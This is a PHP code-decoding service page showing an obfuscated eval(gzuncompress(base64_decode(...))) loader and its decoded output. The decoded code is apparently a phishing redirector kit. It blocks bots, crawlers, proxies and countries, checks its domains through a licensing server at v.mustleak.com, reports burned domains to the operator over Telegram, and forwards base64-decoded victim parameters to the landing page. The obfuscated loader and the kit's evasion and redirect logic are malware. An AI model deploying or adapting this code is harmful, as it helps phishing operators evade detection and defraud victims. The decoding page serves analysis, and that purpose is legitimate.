Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); session_start(); eval(gzuncompress(base64_decode('eJwVlkU..

Decoded Output download

$remoteip = 
  isset($_SERVER["HTTP_CF_CONNECTING_IP"])?
     $_SERVER["HTTP_CF_CONNECTING_IP"]:
     $_SERVER["REMOTE_ADDR"]
  ;

$redi_bot = base64_encode(time().sha1($remoteip.$_SERVER['HTTP_USER_AGENT']).md5(uniqid(rand(), true)));

$_SESSION['redi_watch'] = $redi_bot;

include('config.php');
include_once('functions.php');

if ($fuck2 == 'blog4'){
     header('HTTP/1.0 403 Forbidden');
    die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>Error Fuck</title></head><body><h1>Incomplete setup  </h1><p></p><p> Please go to config.php and change fuck2 to unique url or variable do same with script.txt, also change TELEGRAM_BOT_ADMIN_USERID and TELEGRAM_BOT_TOKEN  to your own ID </p></body></html>');
};


// plugin imports start 


require_once('accesscount.php');

if ($emailaccess_only == true){
    require_once('emailaccess.php');
    
}
if ($crawler_bot == true){
    require_once('crawler.php');
    
}
if ($kill_bot_active == true){
    require_once('killbot/code/include.php');
    
}
if ($country_lock == true){
    require_once('countrylock.php');
    
}

if ($proxy_block == true){
    require_once('proxycheck.php');
}




$_GET[$fuck1] = ($fuck2); //fuck everything ;



if (trim(file_get_contents(URLS_FILE)) == false) {
	header('Location: ' . $FAILED_PAGE_URL);
	exit();
    
}



//there is this function created i should use but am lazy as fuck , you agree with me i did a very dirty work here

foreach (file(URLS_FILE, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $domain) {
$url = 'http://v.mustleak.com/update.php?domain='.$domain.'&key='.$activated.'&host='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'&v=v_15';
//pass variable here 
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
$check = curl_exec($ch);
curl_close($ch);
if ($check == '0'){
    $domains = array($domain);
    break;
    }elseif($check == '2'){
        header('HTTP/1.0 403 Forbidden');
        die('Please support me and get an activation key,  message me at https://t.me/badaxxbot or email me [email protected]');
    }
    else{
        removeLine($domain, URLS_FILE);
        telegramBot(
		'sendMessage',
			[
				'chat_id'    => TELEGRAM_BOT_ADMIN_USERID,
				'text'       => "_
Replace Below URL , Not Safe Anymore

_" . $domain,
				'parse_mode' => 'Markdown',
				'disable_web_page_preview' => 'True',
			]
		);
	
    }
    
}



$query = null;

if ($_GET !== []) {
    foreach ($_GET as $key => &$value) {
        if ($key === $fuck1) continue;
		$value = isBase64($value) ? base64_decode($value) : $value;
		}
		unset($value);
		$query = http_build_query($_GET);
		$query = '?' . str_replace(['%40'], ['@'], $query);
	}
	
	
	

header('Location: ' .$domains[0] .$query);
exit();
    


//Dirty Work ends here

Did this file decode correctly?

Original Code

<?php

error_reporting(0);
session_start();

eval(gzuncompress(base64_decode('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')));





?>

Function Calls

gzuncompress 3
base64_decode 3
session_start 1
error_reporting 1

Variables

None

Stats

MD5 faef05774aca6db0c0db8840be9bffcc
Eval Count 3
Decode Time 50 ms